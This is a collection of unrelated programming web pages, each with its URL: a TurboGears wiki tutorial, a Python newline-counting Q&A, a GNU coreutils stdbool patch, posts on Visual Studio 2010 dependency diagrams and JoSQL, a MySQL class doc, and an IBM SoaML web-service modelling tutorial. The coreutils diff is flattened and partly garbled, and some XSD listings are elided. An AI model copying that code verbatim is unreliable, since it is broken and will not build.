  - Select v1_0 in the File Name column of the table that corresponds to commonTypes. Then uncheck the Add suffix check box and, in the Add prefix field, write commonSchema, so the file name will be commonSchema_v1_0.

Click the disk icon or press Ctrl+S to save the file. The web service model in the Project Explorer will look like the next figure.

Figure 14. Government Agency 1 service example Project Explorer view

Transforming the web service model into WSDL and XSD

It is preferable to transform the common schema before the service artifacts, because the latter depends on the former. So, to transform the model into the WSDL and XSD files, follow these steps:

- Open gov_commonSchema_uml2xsdV1_0 if it is not already open.
- Click the Run button. A file named commonSchema_v1_0.xsd, along with the folder structure government > gov > commonTypes > xml > schemas > v1_0, will be created.

Following similar steps with gov_agency1Schema_uml2xsdV1_0.tc and gov_agencyPrv_Srv1_uml2wsdlV1_0.tc will lead to the creation of BirthCertificateInfo_v1_0.wsdl and BirthCertificateInfoService_v1_0.wsdl, respectively.

Note: Running the transformation configuration again will prompt you to replace the output file, because you selected the Do not merge: Warn before overwriting any files option in the Merge options in the steps for creating the transformation configuration.
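For orientation, the port type that the UML-to-WSDL transformation derives from the interface modeled earlier would look roughly like the following. This is a hand-written sketch using the names from the model; the exact markup that Rational Software Architect generates may differ, and the fault message name here is illustrative:

```xml
<!-- Sketch of the generated port type; "tns" is assumed to map to the
     specification namespace urn:govSrvProvider1.gov/subSystem1/specifications/v1_0/ -->
<wsdl:portType name="BirthCertificateInfo">
  <wsdl:operation name="getBirthCertById">
    <wsdl:input message="tns:getBirthCertByIdRequest"/>
    <wsdl:output message="tns:getBirthCertByIdResponse"/>
    <!-- The fault message name below is illustrative only -->
    <wsdl:fault name="fault" message="tns:getBirthCertByIdFault"/>
  </wsdl:operation>
</wsdl:portType>
```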
Summary

Using an example, this article presented a practical way of designing web services and schema definitions for SOA projects by using the SoaML and XSD Transformation UML profiles. This approach can be used by architects and developers who want to build web services in a top-down manner, using UML, and abstract away from the details of XML. You now know the necessary steps for modeling a web service and its data model.

Resources

For more about SoaML, SOA, and service-oriented modeling:

- SoaML, an OMG standard profile that extends UML 2 for modeling services, service-oriented architecture (SOA), and service-oriented solutions. The profile has been implemented in IBM Rational Software Architect.
- XML Schema Transformation Profile, a UML profile of stereotypes that extend models with XML schema properties that cannot be represented in UML alone.
- UML 2.0 Profile for Software Services, a profile for UML 2.0 that allows for the modeling of services, SOA, and service-oriented solutions.
- Design SOA services with Rational Software Architect, a four-part IBM developerWorks tutorial series by Lee Ackerman and Bertrand Portier (2006-2007) that shows how to design SOA services by using a UML Software Service Profile.
- Service-oriented modeling and architecture: How to identify, specify, and realize services for your SOA, by Ali Arsanjani, about the IBM Global Business Services' Service-Oriented Modeling and Architecture (SOMA) method (IBM developerWorks, November 2004).
This is an interesting program that takes a second to think about. The issue here is logic. Basically, we gather the number of rows we want and compare it in our first for statement. It's going to be greater than zero, so we enter our loop and see another for statement. If "d" is still less than rows - less, we output a decimal point. We then enter our next for statement, which looks at integer "a" and compares our "less" value against it. The resulting number is how many asterisks are output after our decimal points. We then increment "less" until we reach our rows value, as checked in our first for statement.

9. Write a program using nested loops that asks the user to enter a value for the number of rows to display. It should then display that many rows of asterisks, with one asterisk in the first row, two in the second row, and so on. For each row, the asterisks are preceded by the number of periods needed to make all the rows display a total number of characters equal to the number of rows. A sample run would look like this:

Enter number of rows: 5
....*
...**
..***
.****
*****

#include <iostream>

using namespace std;

int main()
{
    int rows = 0;
    int less = 1;

    cout << "Enter number of rows: ";
    cin >> rows;

    for (int i = 0; i < rows; i++)
    {
        for (int d = 0; d < (rows - less); d++)
            cout << ".";
        for (int a = 0; a < less; a++)
            cout << "*";
        cout << endl;
        less++;
    }

    return 0;
}
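For comparison, the same pattern can be produced without the two inner loops by using std::string's fill constructor, which builds a string of n repeated characters. This is an alternative sketch, not part of the original exercise, and the function names are my own:

```cpp
#include <iostream>
#include <string>

// Build one row of the pattern: (rows - r - 1) dots followed by (r + 1) stars,
// where r is the zero-based row index.
std::string makeRow(int r, int rows)
{
    return std::string(rows - r - 1, '.') + std::string(r + 1, '*');
}

// Print the whole pattern for a given number of rows.
void printPattern(int rows)
{
    for (int r = 0; r < rows; r++)
        std::cout << makeRow(r, rows) << '\n';
}
```

Calling printPattern(5) prints the same five rows as the sample run above.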
What is a Convolutional Neural Network (CNN)? How can it be used to detect features in images? This is the video of a live coding session in which I show how to build a CNN in Python using Keras and extend the "smile detector" I built last week to use it. A 1080p version of this video can be found on Cinnamon.

A Convolutional Neural Network is a particular type of neural network that is very well suited to analysing images. It works by passing a 'kernel' across the input image (convolution) to produce an output. These convolutional layers are stacked to produce a deep learning network that is able to learn quite complex features in images.

In this session I coded a simple 3-layer CNN and trained it with manually classified images of faces. Much of the code was based on the previous iteration of this. Subsequent to the live coding session, I actually refactored the code to use Python generators to simplify the processing pipeline.

Frame Generator

This method opens the video file and iterates through the frames, yielding each frame.

def frame_generator(self, video_fn):
    cap = cv2.VideoCapture(video_fn)

    while 1:
        # Read each frame of the video
        ret, frame = cap.read()

        # End of file, so break loop
        if not ret:
            break

        yield frame

    cap.release()

Calculating the Threshold

Like in the previous session, we iterate through the frames to calculate the difference between each frame and the previous one.
It then returns the threshold needed to filter out just the top 5% of images:

def calc_threshold(self, frames, q=0.95):
    prev_frame = next(frames)

    counts = []
    for frame in frames:
        # Calculate the pixel difference between the current
        # frame and the previous one
        diff = cv2.absdiff(frame, prev_frame)
        non_zero_count = np.count_nonzero(diff)

        # Append the count to our list of counts
        counts.append(non_zero_count)
        prev_frame = frame

    return int(np.quantile(counts, q))

Filtering the Image Stream

Another generator that takes in an iterable of the frames and a threshold, and then yields each frame whose difference from the previous frame is above the supplied threshold.

def filter_frames(self, frames, threshold):
    prev_frame = next(frames)

    for frame in frames:
        # Calculate the pixel difference between the current
        # frame and the previous one
        diff = cv2.absdiff(frame, prev_frame)
        non_zero_count = np.count_nonzero(diff)

        if non_zero_count > threshold:
            yield frame

        prev_frame = frame

Finding the Smiliest Image

By factoring out the methods above, we can chain the generators together and pass them into this method to actually look for the smiliest image. This means that (unlike the previous version) this method doesn't need to concern itself with deciding which frames to analyse. We use the trained neural network (as a TensorFlow Lite model) to predict whether a face is smiling. Much of this structure is similar to the last session, in which we first scan the image to find faces. We then align each of those faces using a facial aligner -- this transforms the face such that the eyes are in the same location in each image. We pass each face into the neural network, which gives us a score from 0 to 1.0 of how likely it is to be smiling. We sum all those values up in order to get an overall score of 'smiliness' for the frame.
def find_smiliest_frame(self, frames, callback=None):

    # Allocate the tensors for Tensorflow lite
    self.interpreter.allocate_tensors()
    input_details = self.interpreter.get_input_details()
    output_details = self.interpreter.get_output_details()

    def detect(gray, frame):
        # detect faces within the greyscale version of the frame
        faces = self.detector(gray, 2)

        smile_score = 0

        # For each face we find...
        for rect in faces:
            (x, y, w, h) = rect_to_bb(rect)
            face_orig = imutils.resize(frame[y:y + h, x:x + w], width=256)

            # Align the face
            face_aligned = self.face_aligner.align(frame, gray, rect)

            # Resize the face to the size our neural network expects
            face_aligned = face_aligned.reshape(1, 256, 256, 3)

            # Scale pixel values to 0..1
            face_aligned = face_aligned.astype(np.float32) / 255.0

            # Pass the face into the input tensor for the network
            self.interpreter.set_tensor(input_details[0]['index'], face_aligned)

            # Actually run the neural network
            self.interpreter.invoke()

            # Extract the prediction from the output tensor
            pred = self.interpreter.get_tensor(
                output_details[0]['index'])[0][0]

            # Keep a sum of all 'smiliness' scores
            smile_score += pred

        return smile_score, frame

    best_smile_score = 0
    best_frame = next(frames)

    for frame in frames:
        # Convert the frame to grayscale
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)

        # Call the detector function
        smile_score, frame = detect(gray, frame)

        # Check if we have more smiles in this frame
        # than our "best" frame
        if smile_score > best_smile_score:
            best_smile_score = smile_score
            best_frame = frame

        if callback is not None:
            callback(best_frame, best_smile_score)

    return best_smile_score, best_frame

We can then chain the functions together:

smiler = Smiler(landmarks_path, model_path)

fg = smiler.frame_generator(args.video_fn)
threshold = smiler.calc_threshold(fg, args.quantile)

fg = smiler.frame_generator(args.video_fn)
ffg = smiler.filter_frames(fg, threshold)

smile_score, image = smiler.find_smiliest_frame(ffg)

Output

Testing it out, it all works
pretty well, and finds a nice snapshot from the video of smiling faces.

The full code for this is now wrapped up as a complete Python package: Smiler.

This is a library and CLI tool to extract the "smiliest" frame from a video of people. It was developed as part of Choirless, as part of IBM Call for Code.

Installation

% pip install choirless_smiler

Usage

Simple usage:

% smiler video.mp4 snapshot.jpg

It will do a pre-scan to determine the 5% most-changed frames from their previous frame, in order to consider just them. If you know the threshold of change you want to use, you can supply it, e.g.:

% smiler video.mp4 snapshot.jpg --threshold 480000

The first time smiler runs, it will download facial landmark data and store it in ~/.smiler. The location of this data and the cache directory can be specified as arguments:

% smiler -h
usage: smiler [-h] [--verbose] [--threshold THRESHOLD]
              [--landmarks-url LANDMARKS_URL] [--cache-dir CACHE_DIR]
              [--quantile QUANTILE]
              video_fn image_fn

Save thumbnail of smiliest frame in video

positional arguments:
  video_fn              filename for video to

I hope you enjoyed the video. If you want to catch these sessions live, I stream each week at 2pm UK time on the IBM Developer Twitch channel.
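As a footnote, the "kernel passing across the image" that the convolutional layers perform (mentioned at the top of this post) can be sketched in a few lines of plain NumPy. This is a toy illustration only, not the Keras model from the video, and the function and kernel here are made up for the demo:

```python
import numpy as np

def convolve2d(image, kernel):
    """Slide a kernel over an image (valid padding, stride 1)."""
    kh, kw = kernel.shape
    ih, iw = image.shape
    out = np.zeros((ih - kh + 1, iw - kw + 1))
    for y in range(out.shape[0]):
        for x in range(out.shape[1]):
            # Each output pixel is the sum of the kernel applied
            # to the patch of the image under it.
            out[y, x] = np.sum(image[y:y + kh, x:x + kw] * kernel)
    return out

# A vertical-edge kernel responds where pixel values change left-to-right.
image = np.array([
    [0, 0, 1, 1],
    [0, 0, 1, 1],
    [0, 0, 1, 1],
    [0, 0, 1, 1],
], dtype=float)

kernel = np.array([
    [1, 0, -1],
    [1, 0, -1],
    [1, 0, -1],
], dtype=float)

response = convolve2d(image, kernel)
```

A CNN learns the kernel values during training, rather than having them hand-crafted like the edge detector here.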
In this article, we consider the stack of technologies used in nopCommerce, the most popular ASP.NET shopping cart in the world. nopCommerce has been developed and supported by professionals since 2008. We, the nopCommerce team, always try to keep nopCommerce running on the latest technologies to offer the best experience possible to our users. That's why nopCommerce is the leading ASP.NET-based open-source eCommerce platform for now. nopCommerce is a fully customizable shopping cart: stable, secure, and extendable. From downloads to documentation, nopCommerce.com offers a comprehensive base of information, resources, and support from the nopCommerce community.

The current nopCommerce version runs on .NET Core. Since it's cross-platform, it can be run on Windows, Linux, or macOS. nopCommerce also supports different database types, so let's start by describing the data access layer.

Databases

At the data access layer, you can use Microsoft SQL Server, MySQL, or PostgreSQL as the backend database.

- SQL Server is Microsoft's full-featured relational database management system.
- MySQL is the world's most popular open-source database. With its proven performance, reliability, and ease of use, MySQL has become the leading database choice for web-based applications.
- PostgreSQL is a powerful, open-source object-relational database system with over 30 years of active development that has earned a strong reputation for reliability, feature robustness, and performance.

Support for all these databases comes out of the box, so you don't need lots of extra configuration to set this up. If you look at the source code, you will see the corresponding data providers in the Nop.Data project: PostgreSqlDataProvider, MySqlDataProvider, and MsSqlDataProvider.

Redis

Next, nopCommerce uses Redis. As you may know, Redis is an open-source, in-memory data structure store, used as a database, cache, and message broker.
Redis is used in distributed applications, for example, in web farm scenarios. Using Redis allows us to store data as an in-memory cache dataset. This approach significantly boosts the speed and performance of the application. This is the piece of code from the appsettings.json file that allows you to set up Redis in nopCommerce:

"DistributedCacheConfig": {
  "DistributedCacheType": "redis",
  "Enabled": false,
  "ConnectionString": "127.0.0.1:6379,ssl=False",
  "SchemaName": "dbo",
  "TableName": "DistributedCache"
},

There are also other distributed cache types you can choose from. This screenshot represents the distributed cache settings from the admin area -> App settings page.

Microsoft Azure

The next noteworthy technology that nopCommerce uses is Microsoft Azure. nopCommerce can be deployed on Azure using FTP, Visual Studio web deploy, or the Web Platform Installer. Azure supports multiple instances of nopCommerce, which is great for application scalability. Using this feature, you don't have to worry about whether your site can handle a large number of visitors. Azure also allows us to use BLOB storage, distributed caching, and session management support. This is the piece of code from the appsettings.json file that allows you to set up Azure BLOB storage in nopCommerce:

"AzureBlobConfig": {
  "ConnectionString": "",
  "ContainerName": "",
  "EndPoint": "",
  "AppendContainerName": true,
  "StoreDataProtectionKeys": false,
  "DataProtectionKeysContainerName": "",
  "DataProtectionKeysVaultId": ""
},

It can also be set up from the admin area. This screenshot represents the Azure BLOB storage settings from the admin area -> App settings page.

Business logic

Then, let's discuss the technologies we use in the nopCommerce business logic layer.

Linq2DB

First of all, there's LINQ to DB, a LINQ database access library offering a simple, light, fast, and type-safe layer between objects and the database. In other words, it enables us to work with a database using .NET objects.
It can map .NET objects to a number of database providers. You may choose between MS SQL Server, MySQL Server, and PostgreSQL. So, LINQ to DB is a kind of bridge between the business logic layer and the data layer. If we analyze the code, we can easily find that each database is supported by its own class that implements the INopDataProvider interface and depends on the Linq2DB library. Also, note that all work with table data is carried out through the IRepository interface. This approach lets us control the creation of the tables in the database.

FluentMigrator

To control the creation of the database objects, we use the FluentMigrator library. FluentMigrator is a migration framework for .NET. Migrations are a structured way to alter the database schema and are an alternative to creating lots of SQL scripts that have to be run manually by every developer involved. Migrations solve the problem of evolving a database schema across multiple databases, for example, the developer's local database, the test database, and the production database. Database schema changes are described in classes written in C# that can be checked into a version control system.

To see how we use FluentMigrator in the code, open the CategoryBuilder class, which represents the Category entity configuration for the database. As a parameter of the MapEntity method, you can see the CreateTableExpressionBuilder class, which is the FluentMigrator class that allows us to apply special rules for entity mapping when creating this table.

Then, let's open the DataMigration class. This class inherits from the abstract Migration class. You can create your own migrations, which should also be derived from this abstract class. So, as you can see, we use this class to migrate data from one version of nopCommerce to another. This way we add new records, add new columns, or even delete columns. We also have such migration classes to migrate settings and local resources.
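As an illustration of the pattern (not taken from the nopCommerce source), a minimal migration in FluentMigrator's plain public API looks like this:

```csharp
using FluentMigrator;

// Illustrative migration; the version number, table, and column are made up.
[Migration(20230101120000)]
public class AddCategoryNoteColumn : Migration
{
    public override void Up()
    {
        // Add a new column to an existing table.
        Alter.Table("Category")
            .AddColumn("Note").AsString(400).Nullable();
    }

    public override void Down()
    {
        // Revert the change when migrating back down.
        Delete.Column("Note").FromTable("Category");
    }
}
```

The runner discovers such classes, orders them by version number, and applies any that have not yet been run against the target database.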
In past nopCommerce versions, we used SQL upgrade scripts to apply such changes to the database, which wasn't as handy as it is now. Using the FluentMigrator library allows us to simplify the migration process for any supported database.

AutoMapper

The next library introduced in this article is AutoMapper. AutoMapper is a simple library that helps us transform one object type into another. It is a convention-based object-to-object mapper that requires very little configuration. We need this library, for example, when it comes to retrieving entities from the database and populating the appropriate models.

To illustrate it, let's open the StoreController of the admin area. Here we find the Edit() method, which returns a view enabling Store editing. In this method, as you can see, we retrieve the store from the database first. Then, in the PrepareStoreModel() method, there is just one line that maps the entity to a new model. This is exactly why we need AutoMapper. At the same time, in the AdminMapperConfiguration we have already configured how exactly the store entity should be mapped to the model.

Fluent Validation

The next library we discuss is FluentValidation. It's a validation library for .NET that uses a fluent interface and lambda expressions for building validation rules. We need validation to ensure that inserted data satisfies defined formats and other input criteria during customer registration, creating and updating products and categories in the admin area, adding blog posts, and so on.

Let's look closer. For example, the RegisterValidator class sets validation rules for RegisterModel, which is used for customer registration. In this class we see a rule saying that the Email field should not be empty; if it is, the validator returns the "required" message to the customer. In addition, an inserted email should also match the email address criteria. There are many other validation rules in this file.
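The Email rule described above can be sketched with FluentValidation's public API like this. This is an illustrative fragment, not the exact nopCommerce source, and the model and message strings are made up:

```csharp
using FluentValidation;

// Hypothetical model; the real RegisterModel has many more fields.
public class RegisterModel
{
    public string Email { get; set; }
}

public class RegisterValidator : AbstractValidator<RegisterModel>
{
    public RegisterValidator()
    {
        // Email is required and must match the email-address format.
        RuleFor(m => m.Email)
            .NotEmpty().WithMessage("Email is required.")
            .EmailAddress().WithMessage("Wrong email format.");
    }
}
```

Calling new RegisterValidator().Validate(model) then returns a result object listing every rule the model violates.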
ASP.NET Core internal dependency injection

As you may know, nopCommerce supports the dependency injection software design pattern, which is a technique for achieving Inversion of Control between classes and their dependencies. It allows nopCommerce to stay easily modifiable as it grows in size and complexity. To achieve this we use the built-in ASP.NET Core internal dependency injection.

To illustrate the dependency injection in the code, let's look, for example, at the ProductService class. Here we have many dependencies going into the constructor. If we look at the implementation of one of those dependencies, for example, at the CustomerService, we see that it contains a bunch of dependencies as well. And to resolve these dependencies we create the DependencyRegistrar class, where the AddScoped() method registers such services as ProductService, CustomerService, and others. So, using the ASP.NET Core internal dependency injection, we have a service container that takes on the responsibility of creating an instance of the dependency and disposing of it when it's no longer needed. And we can easily inject the service into the constructor of the class where it should be used.

Autofac

We also use the Autofac library, which is an addictive Inversion of Control container for .NET. Autofac is one of the libraries we use right now, but, it's important to say, we only use this library to wrap the built-in Dependency Injection container from ASP.NET Core. That's why you can find that the only file where we access the Autofac namespace is the Program class. Look at the Main method, where we override the factory used to create the service provider.

User interface

Further, let's see which libraries we use in the User interface layer.

Razor View Engine

Razor View Engine allows us to embed server-based code into web pages to produce HTML. Let's look at the category page view. Razor enables us to easily render the category name and to render the details like the description.
It handles conditions as well: for example, if the description is not empty, we render the appropriate HTML code. Using Razor we can also iterate and display subcategories or featured products.

jQuery

We also use jQuery, which is a JavaScript library used to extend the UI/UX functionality of HTML pages. You can find the appropriate JavaScript files in the "js" folder in wwwroot.

jQuery DataTables and more

In addition, to display the data in tables in the admin area we use the DataTables plug-in for jQuery. We also use a lot of other jQuery plugins, so we don't need to reinvent the wheel and can concentrate on things that matter.
https://www.tutorialsteacher.com/articles/build-ecommerce-application-on-dotnet-framework
Re: [rest-discuss] RE: [xml-dev] ANN: Building Web Services the REST Way

Matt Gushee wrote:
> Actually, you should read this:
> ...
>
> Okay, here's the forest as I see it:
>
> SOAP has existed for about 2 1/2 years, and from very early on has been
> heavily promoted by both Microsoft and IBM.
> ...
> So the fact that REST isn't on the verge of taking over the world means
> what, exactly?

IIRC, Lotus Notes and Compuserve had all of the industry momentum in 1993/1994. The Web was an academic toy. That analogy was not picked at random. Both of those products failed to understand the importance of global, open, linking and addressing.

-- Come discuss XML and REST web services at:
Open Source Conference: July 22-26, 2002, conferences.oreillynet.com
Extreme Markup: Aug 4-9, 2002,

> -----Original Message-----
> From: Paul Prescod [mailto:paul@...]
>
> There is nothing trivial about the amount of money industry
> has spent implementing the REST architecture. I'm sorry if it
> seems that way to you. One of the main inventors of REST is
> also one of the lead designers of Apache (Fielding). So
> surprise, surprise, Apache has REST ideas deep down in its
> core. I see nothing trivial about pointing that out. PHP's
> developers are strongly influenced by the Apache group, so
> PHP has REST ideas deep down in its core too. etc. etc. for IIS.

Well said. Perhaps the problem is that industry is not fully cognizant of what it has been building.

Bill de hÓra .. Propylon

- Bill de hÓra wrote:
> True enough. We all learned web programming so incrementally. It was
> ...
> Well said. Perhaps the problem is that industry is not fully cognizant
> of what it has been building.
I'm reminded that many programmers did not > realize fully what they were doing with OO until the likes of Jim > Coplien and the GoF articulated the idea of Software Patterns. never approached as an architectural style, it was always tactical: "gotta get this information up today. Better give a different URI to each thing so it can be bookmarked. Oops, using POST messes up the 'refresh' button. Better use GET." etc. -- Come discuss XML and REST web services at: Open Source Conference: July 22-26, 2002, conferences.oreillynet.com Extreme Markup: Aug 4-9, 2002, > -----Original Message-----Sure, but that's what J2EE is according to Sun. A big beast. > From: S. Mike Dierken [mailto:mdierken@...] > Sent: 05 July 2002 18:17 > To: rest-discuss@yahoogroups.com > Subject: Re: [rest-discuss] Re: [xml-dev] ANN: Building Web > Services the REST Way > > > > ----- Original Message ----- > From: "Bill de hÓra" <dehora@...> > > > J2EE is way (waayy) more complicated than SOAP; > > EJB+Servlets+JDBC+JAAS+RMI-IIOP+JNDI+JMS... > > That's because it's doing different things. > I wouldn't include IIOP (from Corba) or RMI (from Java) -Yep, but the interop standard for EJB is RMI-IIOP, not RMI; historically > optional & usually available but not required in J2EE. that was invented to keep the CORBA crowd happy. And it's essence is synchronous, RPC and pass by value. I honestly don't know how well the stubs and skeletons thing fits with REST, but otherwise RMI-IIOP doesn't strike me as a RESTful protocol. > JAAS is probably just asJAAS looks nice, it does much the same for authentication and > core - I just don't happen to have any experience with it. authorization that JNDI does for directories and JDBC does for datasources. Clients can declare controls impendent of implementations. I wanted to use it an upcoming project, but I didn't think there was time for me to pick it up properly. Bill de hÓra .. Propylon - Paul wrote: > I don't see the problem. 
> REST is the architecture of the Web and a REST
> toolkit would be a piece of software that helps you build the mediating
> layer between your application and the Web. AFAIK, that's what (e.g.)
> J2EE and Zope are used for. Now that XML has come along it makes sense
> to want to extend these things. Just as they had native knowledge of
> HTML, you might want to give them native knowledge of XML and RDF. And
> maybe newer toolkits could better enforce best practices. But overall, I
> see no problem calling any web development platform a REST toolkit. REST
> is not something new.

I agree with your position that any web development platform could be called a REST toolkit. However, I think a more RESTful toolkit should have types defined in its namespace that correspond to Fielding's documented approach if it's going to make programming RESTfully feel more concretely similar (and IMO easier to comprehend the REST style). For example, here are some of the objects that are being implemented in my toolkit (sorry I keep bringing up my own vaporware, but it's the most concrete thing I have right now): CObject, CString, CList, CTable, CResource, CRepresentation, CConnector, CStream, CRequest, CResponse, CComponent, CFilter, CProxy, etc. Add a handful of sample apps to a class framework like this and you've got a nice simple way to communicate the essence of the RESTful style.

-Philip
https://groups.yahoo.com/neo/groups/rest-discuss/conversations/topics/1694?xm=1&o=1&m=p&tidx=1
This article will show you how to create a Windows GUI with Python's tkinter module. It is very easy to create a pop-up window with the tk module. First start up your NetBeans IDE, then create a new project as I have shown you before in my previous article. Next, enter the script below into the NetBeans code editor and run it!

import tkinter as tk

win = tk.Tk() # create tk instance
win.title("tkinter GUI") # add a title
win.mainloop() # start the GUI

Basically the above Python script will create an empty window with the tkinter module, then start the window's event loop by calling the mainloop method on the Tk instance, as shown in the following graphic.
http://gamingdirectional.com/blog/2016/07/25/how-to-create-windows-graphic-user-interface-with-tkinter/
How do we try to use it?

import com.databricks.dbutils_v1.DBUtilsHolder.dbutils

class Job {
  // business logic ..
  val jobResult: String = ???
  dbutils.notebook.exit(jobResult)
}

When we package the code into a jar we get:

[error] missing or invalid dependency detected while loading class file 'NotebookUtils.class'.
[error] Could not access term common in package com.databricks.backend,
[error] because it (or its dependencies) are missing. Check your build definition for
[error] missing or conflicting dependencies. (Re-run with `-Ylog-classpath` to see the problematic classpath.)
[error] A full rebuild may help if 'NotebookUtils.class' was compiled against an incompatible version of com.databricks.backend.
[error] one error found
[error] (compile:compileIncremental) Compilation failed
https://forums.databricks.com/questions/14129/how-use-dbutils-api.html
Marty Groban (Greenhorn, member since Jun 25, 2011)

Recent posts by Marty Groban

Advice building my GUI

JTree isn't what I'm looking for. I need to draw a binary search tree as in graph theory. I suppose JTree would work, but I'm only going to do that as a last resort. I still have time to figure out how to draw an actual BST.

(Posted 9 years ago in Swing / AWT / SWT)

Advice building my GUI

I am working on a project for an online class I made the mistake of taking this summer, and I need to build a GUI to show how the Huffman code algorithm works. The algorithm part is easy; it's not very complicated. However, I'm unsure of the best way to draw the tree (forest) at each step. It would have to start out as just n nodes (with chars in them) on the screen; then you would press a "next" button and it would pick the two lowest-weighted nodes (based on character frequency), make them children of a new node (with just a weight, no char), and then update the screen/panel. I have made Swing GUIs before; my skills are nothing special, but I know my way around. However, I'm stuck on this implementation. I have a couple hundred lines of code written right now, but it doesn't work and I think it's bad anyway, so I want to "start over" and plan it out better. So I'd just like some advice on the data structure to keep track of the nodes and how to draw them on the screen. I was using an ArrayList of JPanels as nodes and trying to draw them to a null layout. I'm sure this is awful and I'd like to know a better way.
(Posted 9 years ago in Swing / AWT / SWT)

Best Data Structure to solve this problem

I would try to use a doubly linked list.

(Posted 9 years ago in Java in General)

hashing/bloom filter troubles

Here is this assignment I have to do for school. I have to use this bloom filter code and store 'a' to 'z' and 'Z' to 'A' (I'm good on that). Then I have to check for false positives using "aa" to "zz" and "AA" to "ZZ" (not good on that). Here is my code so far. Also, I realize you can't do what I did at the end there with the string loop; I just have that there to try and illustrate what I mean. That may or may not help.

import java.util.Arrays;

public class BloomFilter {
    static final int M = 512;
    static final int f1(int x) { return (x^1) % M; }
    static final int f2(int x) { return ((x^2) + 50) % M; }
    static final int f3(int x) { return ((x^3) + 100) % M; }

    public static void main(String[] args) {
        int b[] = new int[M];
        for (char i = 'a'; i <= 'z'; i++) {
            b[f1(i)] = 1;
            b[f2(i)] = 1;
            b[f3(i)] = 1;
        }
https://www.coderanch.com/u/248595/Marty-Groban
CC-MAIN-2020-34
refinedweb
692
74.22
K-Folds cross-validator¶ K-Folds cross-validator provides train/test indices to split data in train/test sets. Split dataset into k consecutive folds (without shuffling by default). Each fold is then used once as a validation while the k - 1 remaining folds form the training set. from miml.model_selection import KFold X = np.array([[1, 2], [3, 4], [1, 2], [3, 4]]) y = np.array([1, 2, 3, 4]) kf = KFold(n_splits=2) kf.get_n_splits(X) print(kf) for train_index, test_index in kf.split(X): print("TRAIN:", train_index, "TEST:", test_index) X_train, X_test = X[train_index], X[test_index] y_train, y_test = y[train_index], y[test_index] >>> run script... Base cross validation class ('TRAIN:', array([2, 3]), 'TEST:', array([0, 1])) ('TRAIN:', array([0, 1]), 'TEST:', array([2, 3]))
http://meteothink.org/examples/miml/model_selection/kfold.html
CC-MAIN-2020-34
refinedweb
126
60.31
Platform detection no longer works in 0.15 (import { Platform } from 'quasar') Hi, I just upgraded to Quasar 0.15, and I found that my page does not render and throws the following error in the console: TypeError: __WEBPACK_IMPORTED_MODULE_2_quasar__.b.is is undefined I tracked it to the if (Platform.is.cordova)line, which worked fine before the upgrade. But now when I import { Platform } from 'quasar', the Platformobject looks as follows (as found out with console.log): __installed: false install: install() length: 1 name: "install" __proto__: function () __proto__: Object { … } i.e. it doesn’t really look like much. Am I doing something wrong? This part of the docs () has stayed the same even for the 0.15 version. Thanks! This post is deleted!
http://forum.quasar-framework.org/topic/1837/platform-detection-no-longer-works-in-0-15-import-platform-from-quasar
CC-MAIN-2018-13
refinedweb
124
69.48
If you’re an aspiring programmer, it can be hard to choose where to start. There is an incredibly vast number of programming languages you could learn, but which ones among C#, C++, and C will be the most useful? You’ve probably heard of the three variations of the C programming language. Before you choose one to learn, though, you need to understand the differences between C#, C++, and C. What is C? Photo credit to Aptech Malviya Nagar. Despite being published 40 years ago, C is still the most widely used programming language of all time. Programmers still use it in operating systems, kernel-level software, hardware drivers, and applications that need to work with older code. Most old-school programmers will suggest that C is the best programming language to start with because so many newer languages build off of it. It may also offer some security benefits because of its age. The pool of people using it is smaller, making it a less desirable target for hackers. What is C++?. It’s a lot easier to understand C++ if you already have a solid foundation in the C programming language; however, you can still learn C++ as your first language if you want to jump right into object-oriented programming. What is C#?. C# typically sees use in internal or enterprise applications, rather than commercial software. It’s found in client and server development in the .NET framework. While C# is the most technically complicated of the three languages, its syntax is less error-prone than C or C++ and can be learned relatively quickly. Major Differences C and C++ are remarkably similar programming languages, though there are still plenty of differences. C#, on the other hand, has more in common with languages like Java. Here’s an easy guide to understanding the differences between C#, C++, and C. C vs. C++ To fully comprehend the differences between C and C++, you need an understanding of what object-oriented programming is. 
The term object-oriented, as it relates to programming, originated at MIT in the late 50s or early 60s. Object-oriented programming (or OOP) uses a concept called “objects.” An object is an instance of a “class,” or a program-code-template. A class can be made up of data or code procedures (also known as methods). The original C programming language is not object-oriented, which is the most significant difference between the two. C is what’s called a “procedural” programming language, while C++ is a hybrid language that’s a combination of procedural and object-oriented. There are other key differences between C and C++. - C++ was built as an extension of C, which means it can run most C code. The reverse isn’t true though—C can’t run C++ code. - As an object-oriented language, C++ supports polymorphism, encapsulation, and inheritance, while C does not. - In C, data and functions are “free entities,” which means you can manipulate them with outside code. Since C++ encapsulates data and functions together into a single object, those data structures and operators are hidden to outside code. - C++ uses the namespace, which organizes code into logical groups and to prevent name collisions. Name collisions can occur when your code base includes multiple libraries. C does not use a namespace. - C uses functions for input and output, whereas C++ uses objects for input and output. - C++ supports reference variables, which C does not. A reference variable is an alias for an already existing variable, used to create a short-hand notation for faster coding. - C does not provide error or exception handling, but C++ does. Photo credit to Universal Class C++ vs. C#+ As a much more modern programming language, C# was designed to work with the current Microsoft .NET framework in both client and web-based applications. While C++ is an object-oriented language, C# is considered a component-oriented programming language. 
Object-oriented programming concentrates on the associations between classes that link together into a big binary executable, while component-oriented programming uses exchangeable code modules that work on their own and don’t need you to know their inner workings to use them. Here are some other major differences between C++ and C#. - C++ compiles into machine code, while C# compiles to CLR, which is interpreted by ASP.NET. - C++ requires you to handle memory manually, but C# runs in a virtual machine which can automatically handle memory management. - C# does not use pointers, while C++ can use pointers anywhere. - C++ can be used on any platform, though it was originally designed for Unix-based systems. C# is standardized but is rarely used outside of Windows environments. - C++ can create stand-alone and console applications. C# can create a console, Windows, ASP.NET, and mobile applications, but cannot create stand-alone apps. C vs. C# While C and C# are technically related to each other, they’re enormously different languages, so there are more differences than similarities between them. Having a background in C can be useful for learning C# because some of the syntaxes are similar; however, C#’s syntax is so forgiving that you could easily learn it without knowing C at all. Which Language Should You Learn First? Now that you have a clear understanding of the differences between C#, C++, and C, how do you choose which one to learn first? New Programmers Photo credit to Bellevue College If you’ve never learned how to program before, many computer science experts would recommend learning C first. Not only is a simpler language which fewer options than its successors, but many other languages use syntax and concepts introduced by C. That means you’ll have an easier time understanding other languages after learning C. 
